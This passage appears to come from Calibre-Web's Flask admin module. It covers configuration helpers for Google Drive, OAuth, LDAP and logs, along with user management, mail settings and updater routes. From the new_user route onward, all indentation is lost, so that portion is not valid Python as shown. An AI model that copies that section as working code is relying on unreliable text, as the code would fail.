    Response from _configuration_result instead of an error string —
    callers treat any truthy value as an error, verify this is intended.
    """
    gdrive_error = None
    if to_save.get("config_use_google_drive"):
        gdrive_secrets = {}
        # settings.yaml must exist before gdrive can be enabled
        if not os.path.isfile(gdriveutils.SETTINGS_YAML):
            config.config_use_google_drive = False
        if gdrive_support:
            gdrive_error = gdriveutils.get_error_text(gdrive_secrets)
        if "config_use_google_drive" in to_save and not config.config_use_google_drive and not gdrive_error:
            with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
                gdrive_secrets = json.load(settings)['web']
            if not gdrive_secrets:
                return _configuration_result(_('client_secrets.json Is Not Configured For Web Application'))
            gdriveutils.update_settings(
                gdrive_secrets['client_id'],
                gdrive_secrets['client_secret'],
                gdrive_secrets['redirect_uris'][0]
            )
    # always show google drive settings, but in case of error deny support
    new_gdrive_value = (not gdrive_error) and ("config_use_google_drive" in to_save)
    if config.config_use_google_drive and not new_gdrive_value:
        # gdrive switched off: drop the cached watch-changes response
        config.config_google_drive_watch_changes_response = {}
    config.config_use_google_drive = new_gdrive_value
    if _config_string(to_save, "config_google_drive_folder"):
        # folder changed: the local copy of metadata.db is stale
        gdriveutils.deleteDatabaseOnChange()
    return gdrive_error
def _configuration_oauth_helper(to_save):
    """Apply posted OAuth provider credentials to the in-memory blueprints
    and the OAuthProvider table.

    A provider is active only when both client id and secret are set.
    Returns True when credentials changed (a restart is required).
    """
    active_oauths = 0
    reboot_required = False
    for element in oauthblueprints:
        if to_save["config_" + str(element['id']) + "_oauth_client_id"] != element['oauth_client_id'] \
                or to_save["config_" + str(element['id']) + "_oauth_client_secret"] != element['oauth_client_secret']:
            reboot_required = True
            element['oauth_client_id'] = to_save["config_" + str(element['id']) + "_oauth_client_id"]
            element['oauth_client_secret'] = to_save["config_" + str(element['id']) + "_oauth_client_secret"]
        if to_save["config_" + str(element['id']) + "_oauth_client_id"] \
                and to_save["config_" + str(element['id']) + "_oauth_client_secret"]:
            active_oauths += 1
            element["active"] = 1
        else:
            element["active"] = 0
        ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == element['id']).update(
            {"oauth_client_id": to_save["config_" + str(element['id']) + "_oauth_client_id"],
             "oauth_client_secret": to_save["config_" + str(element['id']) + "_oauth_client_secret"],
             "active": element["active"]})
    return reboot_required
def _configuration_logfile_helper(to_save):
    """Apply log-level and logfile settings from the posted form.

    Returns (reboot_required, error_response); error_response is None on
    success, otherwise the Response built by _configuration_result.
    """
    reboot_required = False
    reboot_required |= _config_int(to_save, "config_log_level")
    reboot_required |= _config_string(to_save, "config_logfile")
    if not logger.is_valid_logfile(config.config_logfile):
        return reboot_required, \
            _configuration_result(_('Logfile Location is not Valid, Please Enter Correct Path'))
    reboot_required |= _config_checkbox_int(to_save, "config_access_log")
    reboot_required |= _config_string(to_save, "config_access_logfile")
    if not logger.is_valid_logfile(config.config_access_logfile):
        return reboot_required, \
            _configuration_result(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
    return reboot_required, None
def _configuration_ldap_helper(to_save):
    """Apply and validate the LDAP settings from the posted form.

    Returns (reboot_required, error_response); error_response is None when
    all checks pass, otherwise a Response from _configuration_result.
    Validations: mandatory provider/port/DN/user-object, service account
    credentials per authentication level, "%s" placeholder and balanced
    parentheses in the filters, and existence of the TLS cert/key files.
    """
    reboot_required = False
    reboot_required |= _config_string(to_save, "config_ldap_provider_url")
    reboot_required |= _config_int(to_save, "config_ldap_port")
    reboot_required |= _config_int(to_save, "config_ldap_authentication")
    reboot_required |= _config_string(to_save, "config_ldap_dn")
    reboot_required |= _config_string(to_save, "config_ldap_serv_username")
    reboot_required |= _config_string(to_save, "config_ldap_user_object")
    reboot_required |= _config_string(to_save, "config_ldap_group_object_filter")
    reboot_required |= _config_string(to_save, "config_ldap_group_members_field")
    reboot_required |= _config_string(to_save, "config_ldap_member_user_object")
    reboot_required |= _config_checkbox(to_save, "config_ldap_openldap")
    reboot_required |= _config_int(to_save, "config_ldap_encryption")
    reboot_required |= _config_string(to_save, "config_ldap_cacert_path")
    reboot_required |= _config_string(to_save, "config_ldap_cert_path")
    reboot_required |= _config_string(to_save, "config_ldap_key_path")
    _config_string(to_save, "config_ldap_group_name")
    if to_save.get("config_ldap_serv_password", "") != "":
        # a newly entered service password is stored base64-encoded
        reboot_required |= 1
        config.set_from_dictionary(to_save, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
    config.save()
    if not config.config_ldap_provider_url \
            or not config.config_ldap_port \
            or not config.config_ldap_dn \
            or not config.config_ldap_user_object:
        return reboot_required, _configuration_result(_('Please Enter a LDAP Provider, '
                                                        'Port, DN and User Object Identifier'))
    if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
        if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
            # simple/authenticated bind needs username and password
            if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
                return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account and Password'))
        else:
            # unauthenticated bind needs only the account name
            if not config.config_ldap_serv_username:
                return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account'))
    if config.config_ldap_group_object_filter:
        if config.config_ldap_group_object_filter.count("%s") != 1:
            return reboot_required, \
                _configuration_result(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
        if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
            return reboot_required, _configuration_result(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
    if config.config_ldap_user_object.count("%s") != 1:
        return reboot_required, \
            _configuration_result(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
    if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
        return reboot_required, _configuration_result(_('LDAP User Object Filter Has Unmatched Parenthesis'))
    if to_save.get("ldap_import_user_filter") == '0':
        # user import filter disabled: clear the member-user object
        config.config_ldap_member_user_object = ""
    else:
        if config.config_ldap_member_user_object.count("%s") != 1:
            return reboot_required, \
                _configuration_result(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
        if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
            return reboot_required, _configuration_result(_('LDAP Member User Filter Has Unmatched Parenthesis'))
    if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
        # when any TLS path is given, all three files must exist
        if not (os.path.isfile(config.config_ldap_cacert_path) and
                os.path.isfile(config.config_ldap_cert_path) and
                os.path.isfile(config.config_ldap_key_path)):
            return reboot_required, \
                _configuration_result(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
                                        'Please Enter Correct Path'))
    return reboot_required, None
@admi.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@admin_required
def simulatedbchange():
    """Dry-run check of a new Calibre library path: reports whether it
    differs from the current one and whether it is a valid database."""
    db_change, db_valid = _db_simulate_change()
    return Response(json.dumps({"change": db_change, "valid": db_valid}), mimetype='application/json')
def _db_simulate_change():
    """Compare the posted Calibre library path against the active config.

    Strips a trailing "metadata.db" from the submitted path. Returns
    (db_change, db_valid): whether the path differs from the configured
    one, and whether it points to a valid Calibre database.
    """
    submitted = request.form.to_dict()
    new_dir = re.sub(r'[\\/]metadata\.db$',
                     '',
                     submitted['config_calibre_dir'],
                     flags=re.IGNORECASE).strip()
    db_change = config.config_calibre_dir != new_dir and config.config_calibre_dir
    db_valid = calibre_db.check_valid_db(new_dir, ub.app_DB_path)
    return db_change, db_valid
def _db_configuration_update_helper():
    """Validate and apply a new Calibre library location from the posted form.

    On a library change (or first configuration) all per-library user data
    (shelves, downloads, read state, Kobo sync state) is wiped. Returns the
    rendered DB-configuration page via _db_configuration_result.
    """
    db_change = False
    to_save = request.form.to_dict()
    gdrive_error = None
    to_save['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
                                           '',
                                           to_save['config_calibre_dir'],
                                           flags=re.IGNORECASE)
    try:
        db_change, db_valid = _db_simulate_change()

        # gdrive_error drive setup
        gdrive_error = _configuration_gdrive_helper(to_save)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        # Fix: return here. The result was previously computed and discarded,
        # so execution fell through and hit a NameError on the undefined
        # db_valid below.
        return _db_configuration_result(_("Settings DB is not Writeable"), gdrive_error)

    try:
        metadata_db = os.path.join(to_save['config_calibre_dir'], "metadata.db")
        # with gdrive enabled, fetch metadata.db on first use
        if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(metadata_db):
            gdriveutils.downloadFile(None, "metadata.db", metadata_db)
            db_change = True
    except Exception as ex:
        return _db_configuration_result('{}'.format(ex), gdrive_error)

    if db_change or not db_valid or not config.db_configured:
        if not calibre_db.setup_db(to_save['config_calibre_dir'], ub.app_DB_path):
            return _db_configuration_result(_('DB Location is not Valid, Please Enter Correct Path'),
                                            gdrive_error)
        # if db changed -> delete shelfs, delete download books, delete read books, kobo sync...
        ub.session.query(ub.Downloads).delete()
        ub.session.query(ub.ArchivedBook).delete()
        ub.session.query(ub.ReadBook).delete()
        ub.session.query(ub.BookShelf).delete()
        ub.session.query(ub.Bookmark).delete()
        ub.session.query(ub.KoboReadingState).delete()
        ub.session.query(ub.KoboStatistics).delete()
        ub.session.query(ub.KoboSyncedBooks).delete()
        ub.session_commit()
    _config_string(to_save, "config_calibre_dir")
    calibre_db.update_config(config)
    if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
        flash(_(u"DB is not Writeable"), category="warning")
    config.save()
    return _db_configuration_result(None, gdrive_error)
def _configuration_update_helper():
    """Apply the full server configuration from the posted form.

    Delegates LDAP, OAuth and logfile settings to their helpers; settings
    that affect the running server mark reboot_required, which stops the
    web server after saving. Returns a JSON Response built by
    _configuration_result.
    """
    reboot_required = False
    to_save = request.form.to_dict()
    try:
        reboot_required |= _config_int(to_save, "config_port")
        reboot_required |= _config_string(to_save, "config_trustedhosts")
        reboot_required |= _config_string(to_save, "config_keyfile")
        if config.config_keyfile and not os.path.isfile(config.config_keyfile):
            return _configuration_result(_('Keyfile Location is not Valid, Please Enter Correct Path'))

        reboot_required |= _config_string(to_save, "config_certfile")
        if config.config_certfile and not os.path.isfile(config.config_certfile):
            return _configuration_result(_('Certfile Location is not Valid, Please Enter Correct Path'))

        _config_checkbox_int(to_save, "config_uploading")
        _config_checkbox_int(to_save, "config_unicode_filename")
        # Reboot on config_anonbrowse with enabled ldap, as decorators are changed in this case
        reboot_required |= (_config_checkbox_int(to_save, "config_anonbrowse")
                            and config.config_login_type == constants.LOGIN_LDAP)
        _config_checkbox_int(to_save, "config_public_reg")
        _config_checkbox_int(to_save, "config_register_email")
        reboot_required |= _config_checkbox_int(to_save, "config_kobo_sync")
        _config_int(to_save, "config_external_port")
        _config_checkbox_int(to_save, "config_kobo_proxy")

        if "config_upload_formats" in to_save:
            # normalize the list: trim, lowercase, de-duplicate
            to_save["config_upload_formats"] = ','.join(
                helper.uniq([x.lstrip().rstrip().lower() for x in to_save["config_upload_formats"].split(',')]))
            _config_string(to_save, "config_upload_formats")
            constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')

        _config_string(to_save, "config_calibre")
        _config_string(to_save, "config_converterpath")
        _config_string(to_save, "config_kepubifypath")

        reboot_required |= _config_int(to_save, "config_login_type")

        # LDAP configurator
        if config.config_login_type == constants.LOGIN_LDAP:
            reboot, message = _configuration_ldap_helper(to_save)
            if message:
                return message
            reboot_required |= reboot

        # Remote login configuration
        _config_checkbox(to_save, "config_remote_login")
        if not config.config_remote_login:
            ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()

        # Goodreads configuration
        _config_checkbox(to_save, "config_use_goodreads")
        _config_string(to_save, "config_goodreads_api_key")
        _config_string(to_save, "config_goodreads_api_secret")
        if services.goodreads_support:
            services.goodreads_support.connect(config.config_goodreads_api_key,
                                               config.config_goodreads_api_secret,
                                               config.config_use_goodreads)
        _config_int(to_save, "config_updatechannel")

        # Reverse proxy login configuration
        _config_checkbox(to_save, "config_allow_reverse_proxy_header_login")
        _config_string(to_save, "config_reverse_proxy_login_header_name")

        # OAuth configuration
        if config.config_login_type == constants.LOGIN_OAUTH:
            reboot_required |= _configuration_oauth_helper(to_save)

        reboot, message = _configuration_logfile_helper(to_save)
        if message:
            return message
        reboot_required |= reboot

        # Rarfile Content configuration
        _config_string(to_save, "config_rarfile_location")
        if "config_rarfile_location" in to_save:
            unrar_status = helper.check_unrar(config.config_rarfile_location)
            if unrar_status:
                return _configuration_result(unrar_status)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        # Fix: return the error response — previously it was computed and
        # discarded, so config.save() still ran after a database failure
        # and a success response was returned.
        return _configuration_result(_("Settings DB is not Writeable"))

    config.save()
    if reboot_required:
        web_server.stop(True)

    return _configuration_result(None, reboot_required)
def _configuration_result(error_flash=None, reboot=False):
    """Build the JSON Response for a configuration update.

    With *error_flash* set, the persisted configuration is reloaded
    (discarding unsaved changes) and a danger message is returned;
    otherwise a success message. 'reboot' tells the client whether the
    server is restarting; 'config_upload' echoes the upload formats.
    """
    if error_flash:
        log.error(error_flash)
        config.load()
        messages = [{'type': "danger", 'message': error_flash}]
    else:
        messages = [{'type': "success", 'message': _(u"Calibre-Web configuration updated")}]
    payload = {
        'result': messages,
        'reboot': reboot,
        'config_upload': config.config_upload_formats,
    }
    return Response(json.dumps(payload), mimetype='application/json')
def _db_configuration_result(error_flash=None, gdrive_error=None):
    """Render the database-configuration page, flashing errors/success.

    error_flash: validation error to show (also reloads the persisted
    config, discarding unsaved changes). gdrive_error: pre-computed gdrive
    error text; when None it is re-queried if gdrive is enabled.
    """
    gdrive_authenticate = not is_gdrive_ready()
    gdrivefolders = []
    if not gdrive_error and config.config_use_google_drive:
        gdrive_error = gdriveutils.get_error_text()
    if gdrive_error and gdrive_support:
        log.error(gdrive_error)
        gdrive_error = _(gdrive_error)
        flash(gdrive_error, category="error")
    else:
        # only list drive folders when authentication already succeeded
        if not gdrive_authenticate and gdrive_support:
            gdrivefolders = gdriveutils.listRootFolders()
    if error_flash:
        log.error(error_flash)
        config.load()
        flash(error_flash, category="error")
    elif request.method == "POST" and not gdrive_error:
        flash(_("Database Settings updated"), category="success")
    return render_title_template("config_db.html",
                                 config=config,
                                 show_authenticate_google_drive=gdrive_authenticate,
                                 gdriveError=gdrive_error,
                                 gdrivefolders=gdrivefolders,
                                 feature_support=feature_support,
                                 title=_(u"Database Configuration"), page="dbconfig")
def _handle_new_user(to_save, content, languages, translations, kobo_support):
    """Validate the posted form and create a new user account.

    to_save -- dict of the posted form fields.
    content -- fresh ub.User instance to populate and persist.
    languages/translations/kobo_support -- passed through to the error
        re-render of the user_edit template.

    On validation failure returns the rendered form; on success redirects
    to the admin page. DB errors roll back and only flash (fall through).
    """
    content.default_language = to_save["default_language"]
    content.locale = to_save.get("locale", content.locale)
    # Sidebar flags are posted as checkboxes named "show_<bitvalue>".
    content.sidebar_view = sum(int(key[5:]) for key in to_save if key.startswith('show_'))
    if "show_detail_random" in to_save:
        content.sidebar_view |= constants.DETAIL_RANDOM
    content.role = constants.selected_roles(to_save)
    content.password = generate_password_hash(to_save["password"])
    try:
        if not to_save["name"] or not to_save["email"] or not to_save["password"]:
            log.info("Missing entries on new user")
            raise Exception(_(u"Please fill out all fields!"))
        content.email = check_email(to_save["email"])
        # Query User name, if not existing, change
        content.name = check_username(to_save["name"])
        if to_save.get("kindle_mail"):
            content.kindle_mail = valid_email(to_save["kindle_mail"])
        if config.config_public_reg and not check_valid_domain(content.email):
            log.info("E-mail: {} for new user is not from valid domain".format(content.email))
            raise Exception(_(u"E-mail is not from valid domain"))
    except Exception as ex:
        flash(str(ex), category="error")
        return render_title_template("user_edit.html", new_user=1, content=content,
                                     config=config,
                                     translations=translations,
                                     languages=languages, title=_(u"Add new user"), page="newuser",
                                     kobo_support=kobo_support, registered_oauth=oauth_check)
    try:
        # New accounts inherit the globally configured tag/column restrictions.
        content.allowed_tags = config.config_allowed_tags
        content.denied_tags = config.config_denied_tags
        content.allowed_column_value = config.config_allowed_column_value
        content.denied_column_value = config.config_denied_column_value
        # No default value for kobo sync shelf setting
        content.kobo_only_shelves_sync = to_save.get("kobo_only_shelves_sync", 0) == "on"
        ub.session.add(content)
        ub.session.commit()
        flash(_(u"User '%(user)s' created", user=content.name), category="success")
        log.debug("User {} created".format(content.name))
        return redirect(url_for('admin.admin'))
    except IntegrityError:
        ub.session.rollback()
        log.error("Found an existing account for {} or {}".format(content.name, content.email))
        flash(_("Found an existing account for this e-mail address or name."), category="error")
    except OperationalError:
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
def _delete_user(content):
    """Delete the given ub.User and all rows owned by it.

    Returns a translated success message. Raises Exception when the target
    is the Guest account or when no other admin account would remain.
    """
    # Require at least one *other* admin account before deleting anything.
    if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                        ub.User.id != content.id).count():
        if content.name != "Guest":
            # Delete all books in shelfs belonging to user, all shelfs of user, downloadstat of user, read status
            # and user itself
            ub.session.query(ub.ReadBook).filter(content.id == ub.ReadBook.user_id).delete()
            ub.session.query(ub.Downloads).filter(content.id == ub.Downloads.user_id).delete()
            for us in ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id):
                ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
            ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id).delete()
            ub.session.query(ub.User).filter(ub.User.id == content.id).delete()
            ub.session_commit()
            log.info(u"User {} deleted".format(content.name))
            return(_(u"User '%(nick)s' deleted", nick=content.name))
        else:
            log.warning(_(u"Can't delete Guest User"))
            raise Exception(_(u"Can't delete Guest User"))
    else:
        log.warning(u"No admin user remaining, can't delete user")
        raise Exception(_(u"No admin user remaining, can't delete user"))
def _handle_edit_user(to_save, content, languages, translations, kobo_support):
    """Apply the posted edit-user form to an existing ub.User.

    Returns "" on success, a redirect after a delete or a blocked admin-role
    removal, or the re-rendered edit form on validation failure.
    """
    if to_save.get("delete"):
        try:
            flash(_delete_user(content), category="success")
        except Exception as ex:
            log.error(ex)
            flash(str(ex), category="error")
        return redirect(url_for('admin.admin'))
    else:
        # Refuse to drop the admin role if this is the last admin account.
        if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                                ub.User.id != content.id).count() and 'admin_role' not in to_save:
            log.warning("No admin user remaining, can't remove admin role from {}".format(content.name))
            flash(_("No admin user remaining, can't remove admin role"), category="error")
            return redirect(url_for('admin.admin'))
        if to_save.get("password"):
            content.password = generate_password_hash(to_save["password"])
        # Preserve the anonymous flag across the role rewrite below.
        anonymous = content.is_anonymous
        content.role = constants.selected_roles(to_save)
        if anonymous:
            content.role |= constants.ROLE_ANONYMOUS
        else:
            content.role &= ~constants.ROLE_ANONYMOUS
        # Sidebar visibility checkboxes are posted as "show_<bitvalue>".
        val = [int(k[5:]) for k in to_save if k.startswith('show_')]
        sidebar = get_sidebar_config()
        for element in sidebar:
            value = element['visibility']
            if value in val and not content.check_visibility(value):
                content.sidebar_view |= value
            elif value not in val and content.check_visibility(value):
                content.sidebar_view &= ~value
        if to_save.get("Show_detail_random"):
            content.sidebar_view |= constants.DETAIL_RANDOM
        else:
            content.sidebar_view &= ~constants.DETAIL_RANDOM
        old_state = content.kobo_only_shelves_sync
        content.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
        # 1 -> 0: nothing has to be done
        # 0 -> 1: all synced books have to be added to archived books, + currently synced shelfs
        # which don't have to be synced have to be removed (added to Shelf archive)
        if old_state == 0 and content.kobo_only_shelves_sync == 1:
            kobo_sync_status.update_on_sync_shelfs(content.id)
        if to_save.get("default_language"):
            content.default_language = to_save["default_language"]
        if to_save.get("locale"):
            content.locale = to_save["locale"]
        try:
            if to_save.get("email", content.email) != content.email:
                content.email = check_email(to_save["email"])
            # Query User name, if not existing, change
            if to_save.get("name", content.name) != content.name:
                if to_save.get("name") == "Guest":
                    raise Exception(_("Guest Name can't be changed"))
                content.name = check_username(to_save["name"])
            if to_save.get("kindle_mail") != content.kindle_mail:
                content.kindle_mail = valid_email(to_save["kindle_mail"]) if to_save["kindle_mail"] else ""
        except Exception as ex:
            log.error(ex)
            flash(str(ex), category="error")
            return render_title_template("user_edit.html",
                                         translations=translations,
                                         languages=languages,
                                         mail_configured=config.get_mail_server_configured(),
                                         kobo_support=kobo_support,
                                         new_user=0,
                                         content=content,
                                         config=config,
                                         registered_oauth=oauth_check,
                                         title=_(u"Edit User %(nick)s", nick=content.name),
                                         page="edituser")
    try:
        ub.session_commit()
        flash(_(u"User '%(nick)s' updated", nick=content.name), category="success")
    except IntegrityError as ex:
        ub.session.rollback()
        log.error("An unknown error occurred while changing user: {}".format(str(ex)))
        flash(_(u"An unknown error occurred. Please try again later."), category="error")
    except OperationalError:
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
    return ""
@admi.route("/admin/user/new", methods=["GET", "POST"])
@login_required
@admin_required
def new_user():
content = ub.User()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if request.method == "POST":
to_save = request.form.to_dict()
_handle_new_user(to_save, content, languages, translations, kobo_support)
else:
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
content.locale = config.config_default_locale
content.default_language = config.config_default_language
return render_title_template("user_edit.html", new_user=1, content=content,
config=config, translations=translations,
languages=languages, title=_(u"Add new user"), page="newuser",
kobo_support=kobo_support, registered_oauth=oauth_check)
@admi.route("/admin/mailsettings")
@login_required
@admin_required
def edit_mailsettings():
content = config.get_mail_settings()
return render_title_template("email_edit.html", content=content, title=_(u"Edit E-mail Server Settings"),
page="mailset", feature_support=feature_support)
@admi.route("/admin/mailsettings", methods=["POST"])
@login_required
@admin_required
def update_mailsettings():
to_save = request.form.to_dict()
_config_int(to_save, "mail_server_type")
if to_save.get("invalidate"):
config.mail_gmail_token = {}
try:
flag_modified(config, "mail_gmail_token")
except AttributeError:
pass
elif to_save.get("gmail"):
try:
config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
flash(_(u"Gmail Account Verification Successful"), category="success")
except Exception as ex:
flash(str(ex), category="error")
log.error(ex)
return edit_mailsettings()
else:
_config_string(to_save, "mail_server")
_config_int(to_save, "mail_port")
_config_int(to_save, "mail_use_ssl")
_config_string(to_save, "mail_login")
_config_string(to_save, "mail_password")
_config_string(to_save, "mail_from")
_config_int(to_save, "mail_size", lambda y: int(y)*1024*1024)
try:
config.save()
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return edit_mailsettings()
if to_save.get("test"):
if current_user.email:
result = send_test_mail(current_user.email, current_user.name)
if result is None:
flash(_(u"Test e-mail queued for sending to %(email)s, please check Tasks for result",
email=current_user.email), category="info")
else:
flash(_(u"There was an error sending the Test e-mail: %(res)s", res=result), category="error")
else:
flash(_(u"Please configure your e-mail address first..."), category="error")
else:
flash(_(u"E-mail server settings updated"), category="success")
return edit_mailsettings()
@admi.route("/admin/user/<int:user_id>", methods=["GET", "POST"])
@login_required
@admin_required
def edit_user(user_id):
content = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first() # type: ub.User
if not content or (not config.config_anonbrowse and content.name == "Guest"):
flash(_(u"User not found"), category="error")
return redirect(url_for('admin.admin'))
languages = calibre_db.speaking_language(return_all_languages=True)
translations = babel.list_translations() + [LC('en')]
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if request.method == "POST":
to_save = request.form.to_dict()
resp = _handle_edit_user(to_save, content, languages, translations, kobo_support)
if resp:
return resp
return render_title_template("user_edit.html",
translations=translations,
languages=languages,
new_user=0,
content=content,
config=config,
registered_oauth=oauth_check,
mail_configured=config.get_mail_server_configured(),
kobo_support=kobo_support,
title=_(u"Edit User %(nick)s", nick=content.name),
page="edituser")
@admi.route("/admin/resetpassword/<int:user_id>")
@login_required
@admin_required
def reset_user_password(user_id):
if current_user is not None and current_user.is_authenticated:
ret, message = reset_password(user_id)
if ret == 1:
log.debug(u"Password for user %s reset", message)
flash(_(u"Password for user %(user)s reset", user=message), category="success")
elif ret == 0:
log.error(u"An unknown error occurred. Please try again later.")
flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
log.error(u"Please configure the SMTP mail settings first...")
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
return redirect(url_for('admin.admin'))
@admi.route("/admin/logfile")
@login_required
@admin_required
def view_logfile():
logfiles = {0: logger.get_logfile(config.config_logfile),
1: logger.get_accesslogfile(config.config_access_logfile)}
return render_title_template("logviewer.html",
title=_(u"Logfile viewer"),
accesslog_enable=config.config_access_log,
log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
logfiles=logfiles,
page="logfile")
@admi.route("/ajax/log/<int:logtype>")
@login_required
@admin_required
def send_logfile(logtype):
if logtype == 1:
logfile = logger.get_accesslogfile(config.config_access_logfile)
return send_from_directory(os.path.dirname(logfile),
os.path.basename(logfile))
if logtype == 0:
logfile = logger.get_logfile(config.config_logfile)
return send_from_directory(os.path.dirname(logfile),
os.path.basename(logfile))
else:
return ""
@admi.route("/admin/logdownload/<int:logtype>")
@login_required
@admin_required
def download_log(logtype):
if logtype == 0:
file_name = logger.get_logfile(config.config_logfile)
elif logtype == 1:
file_name = logger.get_accesslogfile(config.config_access_logfile)
else:
abort(404)
if logger.is_valid_logfile(file_name):
return debug_info.assemble_logfiles(file_name)
abort(404)
@admi.route("/admin/debug")
@login_required
@admin_required
def download_debug():
return debug_info.send_debug()
@admi.route("/get_update_status", methods=['GET'])
@login_required
@admin_required
def get_update_status():
if feature_support['updater']:
log.info(u"Update status requested")
return updater_thread.get_available_updates(request.method, locale=get_locale())
else:
return ''
@admi.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@admin_required
def get_updater_status():
status = {}
if feature_support['updater']:
if request.method == "POST":
commit = request.form.to_dict()
if "start" in commit and commit['start'] == 'True':
text = {
"1": _(u'Requesting update package'),
"2": _(u'Downloading update package'),
"3": _(u'Unzipping update package'),
"4": _(u'Replacing files'),
"5": _(u'Database connections are closed'),
"6": _(u'Stopping server'),
"7": _(u'Update finished, please press okay and reload page'),
"8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
"9": _(u'Update failed:') + u' ' + _(u'Connection error'),
"10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
"11": _(u'Update failed:') + u' ' + _(u'General error'),
"12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
"13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
}
status['text'] = text
updater_thread.status = 0
updater_thread.resume()
status['status'] = updater_thread.get_update_status()
elif request.method == "GET":
try:
status['status'] = updater_thread.get_update_status()
if status['status'] == -1:
status['status'] = 7
except Exception:
status['status'] = 11
return json.dumps(status)
return ''
def ldap_import_create_user(user, user_data):
    """Create a local account from one LDAP directory entry.

    user      -- the raw LDAP DN/identifier string (for log messages).
    user_data -- dict of LDAP attributes for that entry.

    Returns (1, None) on success, (0, None) for skippable problems
    (duplicate name/email), or (0, message) for reportable failures.
    """
    user_login_field = extract_dynamic_field_from_filter(user, config.config_ldap_user_object)
    try:
        username = user_data[user_login_field][0].decode('utf-8')
    except KeyError as ex:
        log.error("Failed to extract LDAP user: %s - %s", user, ex)
        message = _(u'Failed to extract at least One LDAP User')
        return 0, message
    # check for duplicate username
    if ub.session.query(ub.User).filter(func.lower(ub.User.name) == username.lower()).first():
        # if ub.session.query(ub.User).filter(ub.User.name == username).first():
        log.warning("LDAP User %s Already in Database", user_data)
        return 0, None
    kindlemail = ''
    if 'mail' in user_data:
        useremail = user_data['mail'][0].decode('utf-8')
        # A second mail attribute, if present, is used as the Kindle address.
        if len(user_data['mail']) > 1:
            kindlemail = user_data['mail'][1].decode('utf-8')
    else:
        # No mail attribute at all: synthesize a placeholder address.
        log.debug('No Mail Field Found in LDAP Response')
        useremail = username + '@email.com'
    try:
        # check for duplicate email
        useremail = check_email(useremail)
    except Exception as ex:
        log.warning("LDAP Email Error: {}, {}".format(user_data, ex))
        return 0, None
    content = ub.User()
    content.name = username
    content.password = ''  # dummy password which will be replaced by ldap one
    content.email = useremail
    content.kindle_mail = kindlemail
    # New LDAP accounts inherit all configured defaults and restrictions.
    content.default_language = config.config_default_language
    content.locale = config.config_default_locale
    content.role = config.config_default_role
    content.sidebar_view = config.config_default_show
    content.allowed_tags = config.config_allowed_tags
    content.denied_tags = config.config_denied_tags
    content.allowed_column_value = config.config_allowed_column_value
    content.denied_column_value = config.config_denied_column_value
    ub.session.add(content)
    try:
        ub.session.commit()
        return 1, None  # increase no of users
    except Exception as ex:
        log.warning("Failed to create LDAP user: %s - %s", user, ex)
        ub.session.rollback()
        message = _(u'Failed to Create at Least One LDAP User')
        return 0, message
@admi.route('/import_ldap_users')
@login_required
@admin_required
def import_ldap_users():
    """Import all members of the configured LDAP group as local accounts.

    Returns a JSON string with a single 'text' status message; the last
    error encountered wins over the success count.
    """
    showtext = {}
    try:
        new_users = services.ldap.get_group_members(config.config_ldap_group_name)
    except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
        log.debug_or_exception(e)
        showtext['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
        return json.dumps(showtext)
    if not new_users:
        log.debug('LDAP empty response')
